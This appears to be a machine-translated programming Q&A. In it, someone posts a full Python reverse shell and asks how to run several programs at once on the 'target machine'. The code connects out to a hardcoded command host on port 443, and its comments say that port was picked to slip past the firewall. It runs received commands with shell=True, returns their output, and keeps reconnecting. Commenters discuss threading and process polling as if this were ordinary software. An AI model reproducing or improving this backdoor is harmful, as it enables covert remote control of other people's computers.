Приведенный ниже код работает, но каждый раз, когда вы запускаете программу, например блокнот на целевой машине, запрос застревает до тех пор, пока я не выйду из программы.Параллельность с модулем подпроцесса. Как я могу это сделать?
Как запустить несколько программ одновременно на целевой машине? Я предполагаю, что это может быть достигнуто либо с помощью нитей, либо подпроцессов, но я все еще не могу использовать эту концепцию.
Как я могу это сделать?
import socket
import time
import subprocess #Executar comandos do SO
#criando a conexao reversa
IP = '192.168.1.33' # ip do cliente linux netcat que sera a central de comando
PORT = 443 # usamos a porta de https pra confundir o firewall : a conexao de saida nao sera bloqueada
def connect(IP,PORT):
#conectando a central de controle
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # IP/TCP
s.connect((IP,PORT))
s.send('[!] Conexao recebida\n') # msg pra ver se foi conectado
#s.close()
return s
except Exception as e:
print('Erro de conexao',e)
return None
def listen(s):
##qdo o cliente nao esta escutando, da erro na conexao e fecha!. Nao quero isso. O server tem que ficar o tempo todo tentando ate conectar!
## versao 3!!!!!!!!!!
#versao 4 usa while True
##########loop infinito para receber comandos
try:
while True:
data = s.recv(1024) # a central de controle envia tb o "Enter" que teclamos apos cada comando {\n}
#print(data)
if data[:-1] == '/exit': #tudo exceto o ultimo caractere, que eh o \n
s.close()#fechar conexao
exit(0) # 0 eh execucao normal/sem erros
else: #executar os comandos
cmd(s,data)
except:
main(s)
def cmd(s,data):
try:
proc = subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
saida = s.send(proc.stdout.read() + proc.stderr.read())
s.send(saida)
#print(proc.stdout.read())
except:
main(s)
def main(s):
if s:
s.close()
while True:
s_connected = connect(IP,PORT)
if s_connected:
listen(s_connected)
else:
print("deu erro na conexao, tentando de novo!!!")##so pra debug
time.sleep(10)
#return 0 #nao precisa
s = None
main(s)
Я предполагаю, что вы имели в виду мультипроцессирование и не многопоточности. Темы существуют в рамках одного процесса. – ElmoVanKielmo
@ElmoVanKielmo, он использует subprocess.Popen, который вы можете запустить и ждать из потока. Threading - это вполне жизнеспособное решение. –
@MadPhysicist Давай. Threading для этого случая? Лучше создать список запущенных процессов и опросить каждого из них, чтобы узнать, завершено ли это. – ElmoVanKielmo